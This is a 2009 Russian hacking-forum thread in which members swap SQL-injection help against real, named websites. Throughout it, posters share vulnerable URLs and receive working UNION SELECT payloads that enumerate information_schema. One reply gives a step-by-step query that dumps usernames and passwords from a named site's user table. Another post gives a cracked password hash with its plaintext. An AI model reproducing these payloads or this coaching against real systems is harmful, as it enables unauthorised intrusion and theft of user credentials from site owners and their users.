RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-03 20:23:05.686666
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
Hash: 413056204f4f383895581adc97cd7d70 pass (расшифрованный Hash): SASHAb А вообще, есть спец ветка форума… Здесь –> http://forum.xakep.ru/m_1024319/tm.htm <–
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-03 20:24:30.940000
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
Lorden, ты постишь в топике о SQL инъекциях вопрос про хеши. Ничего не перепутал?) Список подобных сервисов: http://forum.xakep.ru/m_1153349/tm.htm
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-03 21:05:57.610000
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
quote:
ORIGINAL: farex Hash: 413056204f4f383895581adc97cd7d70 pass (расшифрованный Hash): SASHAb А вообще, есть спец ветка форума… Здесь –> http://forum.xakep.ru/m_1024319/tm.htm <– спасибо большое) сори за то что нетуда постанул
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-03 22:49:46.953333
|
|
|
sver40k
Сообщений: 13
Оценки: 0
Присоединился: 2009-05-31 13:52:31.480000
|
У тянул с одного сайта phpinfo.php, там в таблице mysql есть такая строка: MYSQL_INCLUDE -l/usr/include/mysql Это баг??
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-04 16:09:58.236666
|
|
|
QunneD
Сообщений: 833
Оценки: 0
Присоединился: 2008-11-09 20:54:38.113333
|
quote:
У тянул с одного сайта phpinfo.php, там в таблице mysql есть такая строка: MYSQL_INCLUDE -l/usr/include/mysql Это баг?? Нет
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-10 09:14:35.300000
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
подскажити, вот нашол скулу http://www.fc-zenit.ru/info/news.phtml?showPage=-3 а количество столбцов немогу подобрать( как эт зделать?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-10 11:35:19.030000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Скуля в лимите, не прокатит. Ищи другую на сайте
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-10 12:03:40.060000
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
quote:
ORIGINAL: Pashkela Скуля в лимите, не прокатит. Ищи другую на сайте спс, попробую найти… возник ещё один вопрос вот есть такой запрос -6324+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,table_name,column_name),11+from+information_schema.columns почему выводит ток одну таблитцу и одну колонку к этой таблитце? теоретически должноже выводить все таблитцы и столбцы к этим таблитцам? или я чёт нетак понял?) и ещё вот тут чёт непойму: http://htdig.honestjohn.co.uk/best_deals/item.htm?id=-6324+union+select+1,2,3,4,5,6,7,8,9,table_name,11+FROM+information_schema.tables+WHERE+table_schema=0x61646d696e5f75736572+LIMIT+0,1 должно перейти на таблитцу admin_user а переходит просто на странитцу(
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-10 14:06:55.683333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
quote:
-6324+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,table_name,column_name),11+from+information_schema.columns Ну все правильно. Данный запрос тебе выведет поля table_name и column_name из первой строки таблицы information_schema.columns.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-10 14:13:51.890000
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
quote:
ORIGINAL: horiz quote:
-6324+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,table_name,column_name),11+from+information_schema.columns Ну все правильно. Данный запрос тебе выведет поля table_name и column_name из первой строки таблицы information_schema.columns. ммм а как зделать тогда чтоб сразу все выводило? просто на некоторых скулах когда limit невводиш там сразу выводит все таблитцы…
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-10 14:44:28.990000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
ммм а как зделать тогда чтоб сразу все выводило? просто на некоторых скулах когда limit невводиш там сразу выводит все таблитцы… Никак, но можно выводить больше, чем по одной с помощью group_concat() -6324+union+select+1,2,3,4,5,6,7,8,9,group_concat(concat(table_name,0x3a,column_name)separator+0x3c62723e),11+from+information_schema.columns
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-12 19:34:49.690000
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
вот нашол скулу http://eurogym.ru/index.php?lang_id=0&content_id=1' а кол-во полей енмогу подобрать( или эт какбэ отрицательная скула?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-12 19:47:00.050000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Это какбэ интербейз. Одна из самых запарных СУБД. Вроде бы юнион в этой Субд'e работает… Однако, каждый столбец имеет определённый тип данных. Вообщем, каждый раз, когда она мне встречалась, до конца раскрутить ни разу так и не удалось :)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-12 19:51:02.770000
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
quote:
ORIGINAL: r1dex Это какбэ интербейз. Одна из самых запарных СУБД. Вроде бы юнион в этой Субд'e работает… Однако, каждый столбец имеет определённый тип данных. Вообщем, каждый раз, когда она мне встречалась, до конца раскрутить ни разу так и не удалось :) ну тода небуду даже пытатся) да и непредстовляю себе чё делать нужно) П.С. сорь что невтему но подкинте пжалуста ссылочку на FAQ по инклуду)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-14 10:56:06.003333
|
|
|
EWGhack
Сообщений: 15
Оценки: 0
Присоединился: 2008-01-14 10:27:54.663333
|
quote:
http://sosh1.u-education.ru/?path=news15' и не понятно
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-14 14:24:03.270000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
http://sosh1.u-education.ru/?path=news15%27+and+1=0+union+select+1,2,3,4,5,6,version(),8,9,0,11,12,13,14--+
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-14 14:44:33.540000
|
|
|
EWGhack
Сообщений: 15
Оценки: 0
Присоединился: 2008-01-14 10:27:54.663333
|
r1dex спасибо!!!!
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-15 14:37:04.646666
|
|
|
Viglim [23]
Сообщений: 4
Оценки: 0
Присоединился: 2009-06-15 14:01:36.006666
|
У самого так же, интербэйз плохо на раскрутку идёт..
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-18 00:17:05.253333
|
|
|
ger0in
Сообщений: 2
Оценки: 0
Присоединился: 2009-06-18 00:13:44.213333
|
ребят помоги плиз с иньекцией – http://miss.wapos.ru/photos.php?month=4&year=2009&id=999999 union select database(),version(),3,user(),TABLE_NAME FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1/* вот тут остановился, дальше что то не как, могу выт ащить название таблиц, а данные не как, кто как поможет7???
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-18 11:26:09.316666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
ger0in у меня твой запрос работает шикарно. Перебирай лимит, и в поле "О себе" читай имена таблиц. Учти, что сначала идут таблицы информационной схемы. А лучше посмотри имена всех баз, и читай таблицы в нужной базе.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-18 14:55:04.306666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
вот тут остановился, дальше что то не как, могу выт ащить название таблиц, а данные не как, кто как поможет7??? Дело в том, что таблицы из которых ты пытаешься получить инфу хранятся в другой бд. Пример:
http://miss.wapos.ru/photos.php?month=4&year=2009&id=999999%20union%20select%20concat(table_name,0x3a,table_schema),2,3,4,5%20FROM%20INFORMATION_SCHEMA.TABLES+limit+35,1/* Выводится - soligorsk_users:u01198_1 soligorsk_users - таблица u01198_1 - бд, в которой она лежит.. Смотрим базу, с которой мы работает по умолчанию -
http://miss.wapos.ru/photos.php?month=4&year=2009&id=999999%20union%20select%20database(),2,3,4,5/* Видим - u01198_6. С ней мы и работает по умолчанию, а наша табличка лежит в u01198_1. Делаем вывод:
http://miss.wapos.ru/photos.php?month=4&year=2009&id=999999%20union%20select%20concat(username,0x3a,password),2,3,4,5+from+u01198_1.soligorsk_users/*
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-25 18:01:10.733333
|
|
|
pod_edge
Сообщений: 26
Оценки: 0
Присоединился: 2009-06-25 16:47:08.883333
|
Нашел багу на гугле - http://mail.google.com/support/bin/answer.py?hl=ru&answer=8870' не могу понять, может это слепой скуль?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-25 18:42:28.796666
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
нет
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-28 14:01:57.246666
|
|
|
wolbro
Сообщений: 20
Оценки: 0
Присоединился: 2009-03-09 16:36:44.500000
|
Помогите пожалуйста вот с этим http://www.voob.ru/page.php?division_id=-1+union+select+1,version(),3,4/* . Прочитал статью Уроки группи 9009 но не получается. Помогите плз
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-28 18:48:31.510000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Что именно не получается?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 19:58:31.353333
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
подскажите пожалуйста что подставить, а то я всё перепробывал &date_start=1228078800&date_end=-1+UNION+SELECT+1 The used SELECT statements have a different number of columns SQL was: SELECT se_blogentries.*, se_blogentrycats.*, (SELECT COUNT(*) FROM se_blogcomments WHERE se_blogentries.blogentry_id=se_blogcomments.blogcomment_blogentry_id) as total_comments, (SELECT COUNT(*) FROM se_blogtrackbacks WHERE se_blogentries.blogentry_id=se_blogtrackbacks.blogtrackback_blogentry_id) as total_trackbacks FROM se_blogentries LEFT JOIN se_blogentrycats ON se_blogentries.blogentry_blogentrycat_id=se_blogentrycats.blogentrycat_id WHERE blogentry_user_id='120' AND (blogentry_privacy & '32') && blogentry_date>1228078800 && blogentry_date<-1 UNION SELECT 1 ORDER BY blogentry_date DESC LIMIT 0, 50 &date_start=1228078800&date_end=-1+UNION+SELECT+1,2 The used SELECT statements have a different number of columns SQL was: SELECT NULL FROM se_blogentries WHERE blogentry_user_id='120' AND (blogentry_privacy & '32') && blogentry_date>1228078800 && blogentry_date<-1 UNION SELECT 1,2
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 20:26:16.053333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
GoldCode попробуй так: &date_start=1228078800&date_end=-1+UNION+SELECT+1,2,3,4–
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 20:28:00.003333
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
The used SELECT statements have a different number of columns SQL was: SELECT se_blogentries.*, se_blogentrycats.*, (SELECT COUNT(*) FROM se_blogcomments WHERE se_blogentries.blogentry_id=se_blogcomments.blogcomment_blogentry_id) as total_comments, (SELECT COUNT(*) FROM se_blogtrackbacks WHERE se_blogentries.blogentry_id=se_blogtrackbacks.blogtrackback_blogentry_id) as total_trackbacks FROM se_blogentries LEFT JOIN se_blogentrycats ON se_blogentries.blogentry_blogentrycat_id=se_blogentrycats.blogentrycat_id WHERE blogentry_user_id='47' AND (blogentry_privacy & '32') && blogentry_blogentrycat_id=-1 UNION SELECT 1 ORDER BY blogentry_date DESC LIMIT 0, 50 &category_id=-1+UNION+SELECT+1,2
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 20:29:48.240000
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
quote:
ORIGINAL: horiz GoldCode попробуй так: &date_start=1228078800&date_end=-1+UNION+SELECT+1,2,3,4– The used SELECT statements have a different number of columns SQL was: SELECT NULL FROM se_blogentries WHERE blogentry_user_id='120' AND (blogentry_privacy & '32') && blogentry_date>1228078800 && blogentry_date<-1 UNION SELECT 1,2,3,4–
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 20:46:03.620000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Здесь нельзя заранее сказать количество полей. В таком случае пробуй тупой перебор.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 20:55:53.176666
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
я до 15 дошел?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 20:58:35.563333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Может быть гораздо больше.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 20:59:39.906666
|
|
|
hack001
Сообщений: 2
Оценки: 0
Присоединился: 2009-06-27 20:49:40.086666
|
а какие ещё есть варианты слова юзеров на сайте , кроме user , id , username ?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 21:25:42.860000
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
quote:
ORIGINAL: hack001 а какие ещё есть варианты слова юзеров на сайте , кроме user , id , username ? http://xx.ru/users/
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 22:02:04.403333
|
|
|
pod_edge
Сообщений: 26
Оценки: 0
Присоединился: 2009-06-25 16:47:08.883333
|
а что вот с этим: https://developer.mozilla.org/index.php?title=Special:Article&type=backlinks&pageid=117' вроде не скул, но что-нибудь можно из ошибки вытащить?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 22:05:17.666666
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
?s=classified_date%20DESC&v=0&classifiedcat_id=99999+union+select+concat_ws(0x20,version(),user(),database()),2,3 4.1.22-standard-log emotiona_***@localhost emotiona_*** как мне теперь узнать емайл пользователя?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 22:14:35.210000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
а что вот с этим: https://developer.mozilla.org/index.php?title=Special:Article&type=backlinks&pageid=117' вроде не скул, но что-нибудь можно из ошибки вытащить? Возьми любой переводчик и посмотри, как переводится эта ошибка. quote:
?s=classified_date%20DESC&v=0&classifiedcat_id=99999+union+select+concat_ws(0x20,version(),user(),database()),2,3 4.1.22-standard-log emotiona_***@localhost emotiona_*** как мне теперь узнать емайл пользователя? Подобрать таблицу, подобрать колонки, составить запрос.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-29 22:22:50.303333
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
quote:
?s=classified_date%20DESC&v=0&classifiedcat_id=99999+union+select+concat_ws(0x20,version(),user(),database()),2,3 4.1.22-standard-log emotiona_***@localhost emotiona_*** как мне теперь узнать емайл пользователя? Подобрать таблицу, подобрать колонки, составить запрос. ну я понимаю что надо запрос сотавить, он как хоть выглядить должен?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-30 02:46:13.570000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
?s=classified_date%20DESC&v=0&classifiedcat_id=99999+union+select+concat_ws(0x20,колонка,колонка),2,3+from+таблица+limit+0,1
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-06-30 17:43:29.166666
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
спс, разобрался!
|
|
|
|
|